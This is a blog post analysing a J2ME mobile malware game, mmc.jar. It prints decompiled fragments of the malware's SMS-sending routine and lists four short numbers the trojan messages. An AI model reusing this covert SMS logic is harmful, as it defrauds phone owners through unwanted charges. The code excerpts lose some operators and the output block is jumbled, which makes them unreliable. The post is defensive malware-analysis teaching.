Published on

Mobile Malware Analysis

Authors
  • avatar
    Name
    Predrag TASEVSKI
    Twitter

PURPOSE

The goal of this post is to identify and analyze mobile malware file: mmc.jar. Thereby please follow the following steps for completing the task:

  • Unpack the file (hint – using zip on .jar)
  • Examine .class files using tool available here (local copies for Mac and Linux and Win
  • Find code sending SMSes using ‘sms://’ URI
  • Calculate short number used in SM.send
  • Finally for compiling the code use the developing tool Eclipse IDE.

Firstly, we are going to analysis the Java source code after decompilation. The accent is to find the code that is sending an SMSes using the ‘sms://’ URL. After identifying the linking associated classes we have to compile the code to move toward to final results of URLs. For this purpose we are using the developing tool Eclipse IDE.

Therefore, the results and the sent SMSes URLs are going to be presented into conclusion section. Which will complete the task and will yield the basic analysis of mobile malware file.

ANALYSIS

After running the decompiler tool we are examining and analyzing the Java source code. Whereby on the source code on the class M.class line 343 we have found the following source code:

if ((i >= 35)  (SM.isSending != true)  (i % 6 == 0) (f & count_query)) {  if (SM.GS()) f += 1;   if (f == 1) {            RS.L(rs);            RS.L("Slide");            rs = RS.j("Slide");            game = RS.L(rs, Integer.toString((int)(System.currentTimeMillis() / 1000L)));            RS.L(rs);   }if (f < count_query) {  game = SM.send("sms://" + ms[1][b], ms[2][b]); // sms://  if (b == count_query) b = 1; else b += 1;}

The above code is associated with the class SM.class. With the following source code:

public static int send(String s, String s1){   if (isSending) return 0;      new SM(s, s1);   return -1;}public SM(String s, String s1) { success = false; isSending = true; this.destination = s; this.message = s1; try {      Thread thread = new Thread(this);      thread.start(); } catch (Exception exception) { isSending = false;}

The above code is checking if the message and the destination is correct

and if the message is sent. Coloration is more like the first public static method named send with the two string values of s and s1.

All the above extraction was finished by JD-Gui version 0.3.3 and JD-Core version 0.6.0 and using the menu bar for search, with the criteria that will meet our needs.

The bellow are executable results presented, done by eclipse after compiling the code:

/0SIF|6XI8ULE|YNLD5QDA6WM|YJ90RL/+WPJDAFY2 DC3QJ/+3RKA/5YPA0MD-5QFDwhile 7375/88600168904|7202/65510006691|1899/FTEME 1283|8385/88600168904|1 162 333 494 667375 88600168904 //sms://73757202 65510006691 //sms://72021899 fteme 1283 //sms://18998385 88600168904 //sms://8385decoded367375 88600168904427202 65510006691481899 fteme 128354

From the above presented results after compiling the code we have identify the number of SMSes URLs and in addition the exact URLs.

CONCLUSION

We live in a world where nowadays for everyday work, communication, etc. the most essentially tool is our mobile phones, smart phones, etc. We used them for communication, sending SMS, playing games, checking e-mails, social networking, bank transaction, etc. That is why today there are hundreds and rising everyday mobile malware files. We need to make sure what we are installing in our devices, what kind of games, applications, etc. Therefore, this post will help for a people who are interested to learn basic of how to analysis and identify malware files for mobile phones. However, this is only a basic, and a good guide to give you an idea of what kind of tools, applications you should have. This task is done only for a Java source code mobile malware game.

Furthermore, from the above section we have identify the number of SMSes that are sent and to what numbers. The total number of SMSes is 4 and sent to the following URLs:

sms://7375sms://7202sms://1899sms://8385

Finally, mobile malware is rising and it is about to explode, therefore users need education[1]. By delivering basic and advance mobile malware security awareness program we will have less malware attacks and better security policy into everyday mobile, smart phones usage.

Bibliography

[1] Chris Martin, Mobile malware is about to explode, users need education, 20 Jan. 2012, link